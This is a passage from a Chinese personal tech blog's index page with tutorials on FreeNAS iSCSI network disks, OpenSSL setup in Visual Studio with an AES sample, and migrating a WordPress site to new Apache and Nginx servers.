<a href="/2286.html" class="post-title-link" itemprop="url">计算机网络探究四之使用FreeNAS提供网络硬盘</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="FreeNAS-简介"><a href="#FreeNAS-简介" class="headerlink" title="FreeNAS 简介"></a>FreeNAS 简介</h2> FreeNAS 是什么？ FreeNAS 是一款广受赞誉的开源免费 NAS 操作系统。它能把普通台式机瞬间变成一台多功能 NAS 服务器。不但适用于企业文件共享，同样适用于打造家庭媒体中心。 FreeNAS 支持多种共享协议，包括 SMB/CIFS、NFS、AFP、WebDAV、iSCSI、FTP/TFTP、RSync 等。 <a href="http://www.getnas.com/" target="_blank" rel="noopener">官方网站</a> <h2 id="iSCSI"><a href="#iSCSI" class="headerlink" title="iSCSI"></a>iSCSI</h2> iSCSI 技术是一种由 IBM 公司研究开发的，是一个供硬件设备使用的可以在 IP 协议的上层运行的 SCSI 指令集，这种指令集合可以实现在 IP 网络上运行 SCSI 协议，使其能够在诸如高速千兆以太网上进行路由选择。iSCSI 技术是一种新储存技术，该技术是将现有 SCSI 接口与以太网络(Ethernet)技术结合，使服务器可与使用 IP 网络的储存装置互相交换资料。 iSCSI：Internet 小型计算机系统接口（iSCSI：Internet Small Computer System Interface）。 <h2 id="本篇目标"><a href="#本篇目标" class="headerlink" title="本篇目标"></a>本篇目标</h2> 那么本篇文章的目标就是记录一下怎样使用 FreeNAS 配置一个输入我们的网络存储服务。 <h2 id="下载安装"><a href="#下载安装" class="headerlink" title="下载安装"></a>下载安装</h2> 首先我们要下载 FreeNAS 的镜像，由于 FreeNAS 9 对系统的要求比较高，在这里我们用到的是 FreeNAS 8。 <a href="http://pan.baidu.com/s/1geb2C1t" target="_blank" rel="noopener">镜像下载</a> 下载完成之后我们利用 VMware 安装即可。安装界面提供了四个选项： <ol> <li>Install/Upgrade 安装/升级</li> <li>Shell 终端</li> <li>Reboot System 重启系统</li> <li>Shutdown System 关闭系统</li> </ol> <img src="http://7xnt0e.com1.z0.glb.clouddn.com/wp-content/uploads/2015/01/20150129171248.png" alt="20150129171248"> 使用键盘上的方向键切换菜单，选择第一项，按回车键确认。接下来系统会提示选择 FreeNAS 系统盘，在如下图所示的界面中会显示出所有可以用作安装 FreeNAS 系统的设备。你需要根据自己界面上显示的实际内容进行选择，此处应该选择我们准备作为 FreeNAS 系统盘的另一块 U 盘，选择好以后按回车键确认。 <img src="http://7xnt0e.com1.z0.glb.clouddn.com/wp-content/uploads/2015/01/20150129171601.png" alt="20150129171601"> 此时，界面上显示了一些警告信息，大意为“你选择作为 FreeNAS 系统盘的设备上的所有数据都会被清空，而且该设备将完全被系统占用，不能用作数据存储。” 按回车键确认。 <img src="http://7xnt0e.com1.z0.glb.clouddn.com/wp-content/uploads/2015/01/20150129171850.png" alt="20150129171850"> 确认后，系统开始执行安装，如下图所示。 <img src="http://7xnt0e.com1.z0.glb.clouddn.com/wp-content/uploads/2015/01/20150129172137.png" alt="20150129172137"> 系统安装完成后会给出成功提示，提醒我们移除安装盘，如下图。不用理会，按回车键继续。 <img src="http://7xnt0e.com1.z0.glb.clouddn.com/wp-content/uploads/2015/01/20150129172300.png" alt="20150129172300"> 此时，系统又回到了最初的安装界面，如下图所示。用方向键切换选择第四项，按回车键关闭系统。 <img src="http://7xnt0e.com1.z0.glb.clouddn.com/wp-content/uploads/2015/01/20150129172526.png" alt="20150129172526"> 待系统完全关闭以后，再次启动电脑，并设置从 U 盘系统盘引导，成功启动以后，看到如下所示的界面，代表系统已经安装完成。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171035.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171035.png" alt="20151213171035"></a> 接下来，你可以使用浏览器访问界面中给出的 IP 地址打开 FreeNAS 的 WebGUI 管理界面了。 <h2 id="网页配置"><a href="#网页配置" class="headerlink" title="网页配置"></a>网页配置</h2> 接下来，我们就可以通过浏览器来配置我们的 FreeNAS 了。通过系统的提示，我们访问以下链接即可： <a href="http://192.168.231.131/" target="_blank" rel="noopener">http://192.168.231.131/</a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171159.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171159-1024x549.png" alt="20151213171159"></a> 访问之后，可以看到如上内容。点击 setting，先切换一下语言，简体中文。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171352.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171352.png" alt="20151213171352"></a> 接下来我们便开始 iSCSI 的配置啦。 <h2 id="iSCSI-配置"><a href="#iSCSI-配置" class="headerlink" title="iSCSI 配置"></a>iSCSI 配置</h2> 1.首先开启 iSCSI 服务，然后点击右侧的设置图标进入设置界面。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213173030.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213173030.png" alt="20151213173030"></a> 2.添加 iSCSI 端口，选择默认设置即可。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171558.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171558.png" alt="20151213171558"></a> 3.添加网络授权信息 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171648.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171648.png" alt="20151213171648"></a> 两个全部填写为 ALL 即可。 4.添加 iSCSI 用户信息 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171733.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171733.png" alt="20151213171733"></a> 填入用户信息和秘钥即可，下方的输入框是加密可选的。 5.添加 iSCSI 属性信息 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171855.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171855.png" alt="20151213171855"></a> 6.添加存储设备在这里我们首先要添加一块磁盘，在 VMware 中的设置里添加一块磁盘，在这里分配为 20G。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171951.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213171951.png" alt="20151213171951"></a><a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172007.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172007.png" alt="20151213172007"></a> 在 FreeNAS 设置界面中，添加扩展设备。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172115.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172115.png" alt="20151213172115"></a> 7.关联目标将用户信息和磁盘信息关联起来。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172143.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172143.png" alt="20151213172143"></a> 通过以上流程，我们便完成了一个网络硬盘的配置。 <h2 id="Windows-使用"><a href="#Windows-使用" class="headerlink" title="Windows 使用"></a>Windows 使用</h2> 好，配置好了网络硬盘，那么我们就在 Windows 下使用一下吧，Windows 7 以上的系统自带了 iSCSI 服务。我们可以直接在控制面板里面找到它。在控制面板中搜索。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172329.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172329.png" alt="20151213172329"></a> 然后，会出现一个属性设置窗口。点击发现，发现门户，输入刚才 FreeNAS 的地址即可。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172518.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172518.png" alt="20151213172518"></a> 接下来在目标的选项卡中我们会看到刚才配置的一个目标，点击下方的连接即可。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172541.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172541.png" alt="20151213172541"></a> 连接成功之后，我们便可以完成连接了。打开磁盘设置，我们便可以看到那个 20G 的磁盘了，然后新建简单卷。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172806.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172806.png" alt="20151213172806"></a> 格式化为 NTFS 系统，刷新一下，打开计算机。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172840.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151213172840.png" alt="20151213172840"></a> 我们可以发现，一个新的网络磁盘便安装成功啦。可以向其中放置任何文件，与其他的磁盘没有任何区别！ <h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2> FreeNAS 是一个非常强大的工具，在这里我们只涉及到了 iSCSI 服务的使用，还有更多等待着我们的探索，小伙伴们快来试验一下吧。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-12-13 17:42:50" itemprop="dateCreated datePublished" datetime="2015-12-13T17:42:50+08:00">2015-12-13</time> 阅读次数： 本文字数： 1.8k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2266.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> C/C++ </a> <a href="/2266.html" class="post-title-link" itemprop="url">VS中OpenSSL环境配置示例</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> 最近在研究信息安全，需要用到 OpenSSL 库，我用到的开发 IDE 是 VS2012，所以，在这里也记录一下我配置 VS2012 的 OpenSSL 库的过程。 <h2 id="下载-OpenSSL-库"><a href="#下载-OpenSSL-库" class="headerlink" title="下载 OpenSSL 库"></a>下载 OpenSSL 库</h2> OpenSSL 库大家可以自行下载源码然后用 ruby 进行编译，另外我们也可以选择直接下载编译好的类库。这里我们利用的后者，在此提供一个下载链接。 <a href="http://pan.baidu.com/s/1dEs1nxR" target="_blank" rel="noopener">OpenSSL-Win32</a> 下载完成之后解压，比如我的放到了 D 盘。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207162627.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207162627.png" alt="20151207162627"></a> <h2 id="新建项目"><a href="#新建项目" class="headerlink" title="新建项目"></a>新建项目</h2> 首先，我们找一段测试代码，在此利用的是 AES 算法的示例。 <figure class="highlight cpp"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 </pre> </td> <td class="code"> <pre>#include <stdio.h> #include <openssl/aes.h> #include <stdlib.h> #include <string.h> int main() { unsigned char key[16+1] = "my-key-i-choosed"; // 128bits key (应该是真正的随机数才好) char pt1[16+5+1] = "0123456789abcdef12345"; // 明文 char ct[16+5+1]; // 密文 char pt2[16+5+1]; // 解密后的明文 AES_KEY k; unsigned char iv1[16+1] = {"1023456789abcdef"}; // 16+1，加密用 unsigned char iv2[16+1] = {"1023456789abcdef"}; // 16+1，解密用 { // single blcok test AES_set_encrypt_key(key, 16*8, &k); AES_encrypt((unsigned char*)pt1, (unsigned char*)ct, &k); AES_set_decrypt_key(key, 16*8, &k); AES_decrypt((unsigned char*)ct, (unsigned char*)pt2, &k); if (memcmp(pt1, pt2, 16)==0) puts("AES block ok"); else puts("AES block err"); } { // cfb mode (stream mode) int num=0; AES_set_encrypt_key(key, 16*8, &k); AES_cfb128_encrypt((unsigned char*)pt1, (unsigned char*)ct, 16+5, &k, (unsigned char*)iv1, &num, AES_ENCRYPT); num=0; AES_set_encrypt_key(key, 16*8, &k); // MUST as enc AES_cfb128_encrypt((unsigned char*)ct, (unsigned char*)pt2, 16+5, &k, (unsigned char*)iv2, &num, AES_DECRYPT); if (memcmp(pt1, pt2, 16+5)==0) puts("AES CFB mode ok"); else puts("AES CFB mode err"); } system("pause"); return 0; } </pre> </td> </tr> </table> </figure> 接下来新建一个项目，win32 控制台程序，空项目，完成。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207161749.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207161749.png" alt="20151207161749"></a> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207161824.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207161824.png" alt="20151207161824"></a> 新建源文件，我取名叫做 aes.cpp，将代码复制进去，可以看到代码最初是在报错的。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207162418.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207162418.png" alt="20151207162418"></a> 好，接下来我们进行环境配置。 <h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2> 右键项目名称，弹出一个菜单，选择属性。在 VC++目录选项卡中，添加包含目录和库目录。在这里，我的包含目录就是刚才解压的 OpenSSL 目录的 include 目录，库目录则是 lib 目录。 注意：分号要是英文分号，英文分号！ <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207162929.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207162929.png" alt="20151207162929"></a> 接下来选择连接器选项卡，输入 libeay.lib 和 ssleay32.lib 两个附加依赖项。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207163915.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207163915.png" alt="20151207163915"></a> 现在右击项目，重新生成。我们可以看到，程序可以正常生成 exe 了。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164034.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164034.png" alt="20151207164034"></a> 但是直接运行的话会报错，是因为缺少 dll 文件。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164304.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164304.png" alt="20151207164304"></a> 之后，将项目中的 libeay32.dll 和 ssleay32.dll 文件放入项目的 debug 目录即可。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164444.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164444.png" alt="20151207164444"></a> 最后项目的 debug 目录如下 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164405.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164405.png" alt="20151207164405"></a> 重新运行 exe 程序，发现已经正常运行。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164736.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151207164736.png" alt="20151207164736"></a> 至此，VS 配置 OpenSSL 环境的过程已经全部完成。其他项目类似，大家可以试着配一下。如有问题，欢迎留言交流~ </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-12-07 16:50:54" itemprop="dateCreated datePublished" datetime="2015-12-07T16:50:54+08:00">2015-12-07</time> 阅读次数： 本文字数： 1.9k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2249.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Linux </a> <a href="/2249.html" class="post-title-link" itemprop="url">WordPress从Apache迁移到Apache过程</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> 最近服务器要过期了，需要进行迁移，新服务器如果上面配置的是 Apache 服务器该怎么办呢？系统：Ubuntu 14.04 <h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2> 首先新主机上配置好 apache 环境，这个就不多说了，直接执行下面的命令即可。 <figure class="highlight smali"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 </pre> </td> <td class="code"> <pre>sudo apt-get install apache2 sudo apt-get install php5 php5-cgi php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-mhash php5-ming php5-pspell php5-recode php5-snmp php5-tidy php5-xmlrpc php5-sqlite php5-xsl sudo apt-get install mysql-server mysql-client sudo apt-get install libapache2-mod-php5 sudo apt-get install libapache2-mod-auth-mysql sudo apt-get install phpmyadmin sudo ln -s /usr/share/phpmyadmin/ /var/www/html/phpmyadmin </pre> </td> </tr> </table> </figure> 通过以上配置，新主机便可以实现 lamp 环境的配置了。 <h2 id="代码迁移"><a href="#代码迁移" class="headerlink" title="代码迁移"></a>代码迁移</h2> 首先旧主主机上打包一下代码，比如一个文件夹名字叫 wonder <figure class="highlight css"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>tar -zcvf wonder.tar.gz wonder </pre> </td> </tr> </table> </figure> 然后，打包完成之后，便会出现一个名字叫做 wonder.tar.gz 的文件可以利用 wget 方式直接下载。 <figure class="highlight groovy"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>wget http://xxx.xxx.xxx.xxx/wonder.tar.gz </pre> </td> </tr> </table> </figure> 下载完成之后，直接解压即可。这样代码就取到了。 <h2 id="数据库迁移"><a href="#数据库迁移" class="headerlink" title="数据库迁移"></a>数据库迁移</h2> 数据库迁移无非就是在 phpmyadmin 之间导入导出，这个很简单。但是重要的一点是，需要把 wp-options 表中的两个 URL 配置改掉，比如原来是一个域名链接，现在需要改为 IP+文件名。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128144223.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128144223-1024x351.png" alt="20151128144223"></a> 否则，浏览器会提示重定向循环的问题。 <h2 id="服务器配置"><a href="#服务器配置" class="headerlink" title="服务器配置"></a>服务器配置</h2> 首先我们需要将域名解析到这个主机。配置示例域名：wonderlee.me <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128144413.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128144413.png" alt="20151128144413"></a> 然后配置一下，vhost，在 apache 下配置是这样的首先在 /etc/apache2/apache2.conf 中加入如下两行 <figure class="highlight autoit"> <table> <tr> <td class="gutter"> <pre>1 2 </pre> </td> <td class="code"> <pre># Include all the user configurations: Include httpd.conf </pre> </td> </tr> </table> </figure> 然后我们需要在 httpd.conf 配置一下域名解析新建一个 /etc/apach2/httpd.conf，加入如下内容 <figure class="highlight angelscript"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 </pre> </td> <td class="code"> <pre>ServerName 115.28.24.44:80 <VirtualHost 115.28.24.44:80> DocumentRoot /var/www/html ServerName 115.28.24.44 </VirtualHost> <VirtualHost 115.28.24.44:80> DocumentRoot /var/www/html/wonder ServerName wonderlee.me ServerAlias wonderlee.me </VirtualHost> </pre> </td> </tr> </table> </figure> 然后执行服务器重启操作。 <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo service apache2 restart </pre> </td> </tr> </table> </figure> 好，这样的话我们的域名配置解析就好了。输入 wonderlee.me 即可解析到 wonder 文件夹啦。可以输入你的域名试试看，已经可以了吧。然后我们需要开启 rewrite 模块。输入命令 <figure class="highlight coq"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo a2enmod rewrite </pre> </td> </tr> </table> </figure> 然后修改 /etc/apache2/apache2.conf 文件 <figure class="highlight apache"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 </pre> </td> <td class="code"> <pre><Directory /var/www/> Options Indexes FollowSymLinks AllowOverride None Require all granted </Directory> </pre> </td> </tr> </table> </figure> 改为 <figure class="highlight apache"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 </pre> </td> <td class="code"> <pre><Directory /var/www/> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> </pre> </td> </tr> </table> </figure> 即可，结束之后重启一下服务器。 <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo service apache2 restart </pre> </td> </tr> </table> </figure> 在项目目录下新建一个文件 .htaccess，来支持重写 <figure class="highlight apache"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 </pre> </td> <td class="code"> <pre># BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase /wonder/ RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /wonder/index.php [L] </IfModule> # END WordPress </pre> </td> </tr> </table> </figure> 好，这样，重写过程就完成啦。 <h2 id="网站配置"><a href="#网站配置" class="headerlink" title="网站配置"></a>网站配置</h2> 最后，需要将网站的配置修改一下，比如固定链接 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128145507.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128145507.png" alt="20151128145507"></a> 比如网站的基地址 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128145620.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151128145620.png" alt="20151128145620"></a> 至此，网站配置工作全部完成，欢乐地上网体验一下吧如有问题，欢迎留言。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-11-28 14:59:07" itemprop="dateCreated datePublished" datetime="2015-11-28T14:59:07+08:00">2015-11-28</time> 阅读次数： 本文字数： 2.2k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2227.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Linux </a> <a href="/2227.html" class="post-title-link" itemprop="url">WordPress从Apache迁移到Nginx过程</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> 之前一直都用 Apache 服务器，由于网站访问量比较大，另外加上旧服务器快到期了，准备迁移到新的服务器上，所以决定采用 Nginx 服务器。迁移过程比较心酸，之前一直用 apache，对 nginx 服务器配置不熟悉，踩了很多坑。下面说一下我的网站从旧主机（配有 apache 服务器）迁移到新主机（配有 nginx 服务器）的过程。 <h2 id="代码迁移"><a href="#代码迁移" class="headerlink" title="代码迁移"></a>代码迁移</h2> 这个过程其实也是比较心酸的，查看了一下目录结构占用空间已经足足快 1 个 G 了，可想而知里面占用的大部分空间是上传的图片素材。不过要是迁移全部图片的话工程量实在是巨大。不过，好消息是我从开始就使用了七牛 CDN 加速，所以，上传的图片会自动存放到七牛，只不过也在主机本地留了备份而已，所以，我可以安心地删掉它们了。那么对代码进行瘦身之后，这里就有两种方法来迁移了： 1.可以用 git 上传到 github，然后用另一台主机把代码拉下来即可，在此不再赘述。 2.打包上传，然后直接在另一台主机上下载下来，由于我的两台主机在同一局域网内，所以我直接采用了这种方式，传输速度快。 <h3 id="打包"><a href="#打包" class="headerlink" title="打包"></a>打包</h3> 由于代码中含有 .git 目录，所以这部分我们不需要打包，那么压缩时我们就需要排除这个文件夹。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151113155701-e1447401563242.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/11/20151113155701-e1447401563242.png" alt="20151113155701"></a> 文件夹名叫 cqc，那么我们就打包一下，排除.git 目录，使用如下命令 <figure class="highlight stylus"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>tar -zcvf cqc.tar.gz --exclude=cqc/.git cqc </pre> </td> </tr> </table> </figure> 运行结束后会出现 cqc.tar.gz 文件，这就是目录压缩包。然后我们只需要在另一台主机上输入 <figure class="highlight groovy"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>wget http://xxx.xxx.xxx.xxx/cqc.tar.gz </pre> </td> </tr> </table> </figure> 即可完成下载，速度可是嗖嗖的然后解压即可，代码便完成了迁移。 <h2 id="数据库迁移"><a href="#数据库迁移" class="headerlink" title="数据库迁移"></a>数据库迁移</h2> 数据库用二者的 phpmyadmin 导出和上传即可。我导出 .sql 文件，大小为 9M，而 phpMyAdmin 的上传限制大小是 2M，怎么办？其实我们可以压缩 .sql 文件为 zip 格式，压缩之后就有了 1.4M 了，分分钟完成上传。要知道 phpMyAdmin 可是支持 .sql.zip 文件的。接下来是一个比较重要的部分，那就是配置一下站点信息。直接修改数据库的两个 URL。分别是 siteurl 和 home，一定要修改为 <a href="http://xxx.xxx.xxx.xxx/cqc" target="_blank" rel="noopener">http://xxx.xxx.xxx.xxx/cqc</a> 的形式，也就是把原来的域名改成 IP 加目录的形式，要不然网站是无法访问的，会出现多重循环定向的提示。好，其他的没什么问题，连接数据库错误的话就修改一下目录的 wp-config.php 文件吧，连接数据库的信息修改正确就好了。 <h2 id="配置-vhosts"><a href="#配置-vhosts" class="headerlink" title="配置 vhosts"></a>配置 vhosts</h2> 和 apache 一样，我们多个域名肯定要可以解析到不同的目录吧，nginx 当然也是支持的。接下来我们需要把新域名解析到 cqc 目录，在 nginx 下怎么做呢？其实还是比较简单的。在 /etc/nginx 目录下可以新建一个 vhosts 文件夹。在这里我们要解析 cqc 目录，那么我就新建一个 cqc.conf 文件。现在例如我要把 blog.cuiqingcai.com 解析到 cqc 文件夹，配置如下 <figure class="highlight nginx"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 </pre> </td> <td class="code"> <pre>server { listen 80; server_name cuiqingcai.com blog.cuiqingcai.com; index index.html index.htm index.php; root /var/www/cqc; location / { if (!-e $request_filename) { rewrite ^([_0-9a-zA-Z-]+)?(/wp-.*) $2 last; rewrite ^([_0-9a-zA-Z-]+)?(/.*\.php)$ $2 last; rewrite ^ /index.php last; } } location ~ \.php$ { fastcgi_pass 127.0.0.1:9000; # # With php5-fpm: # fastcgi_pass unix:/var/run/php5-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /var/www/cqc$fastcgi_script_name; include fastcgi_params; } } </pre> </td> </tr> </table> </figure> 其中 <figure class="highlight nginx"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 </pre> </td> <td class="code"> <pre>location / { if (!-e $request_filename) { rewrite ^([_0-9a-zA-Z-]+)?(/wp-.*) $2 last; rewrite ^([_0-9a-zA-Z-]+)?(/.*\.php)$ $2 last; rewrite ^ /index.php last; } } </pre> </td> </tr> </table> </figure> 这一部分是伪静态重写，因为我的博客用的是 wordpress，所以伪静态重写是这样的。当然还有其他的重写方式可以尝试。之后在 /etc/nginx/nginx.conf 中的 http{} 中添加一行 <figure class="highlight gradle"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>include /etc/nginx/vhosts/cqc.conf; </pre> </td> </tr> </table> </figure> 则代表引用了这个文件。注意，还要把域名设置一下，添加一条 A 记录到主机上。好了，一切大功告成了。 <h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2> 迁移和配置的过程坑实在是太多了，列列吧，警醒世人呐。（1）代码迁移过程上传 git，整个项目差不多 1 个 G，由于数据量太大，导致内存不够无法正常上传。后来删除了图片，发现项目还是很大，结果发现是 .git 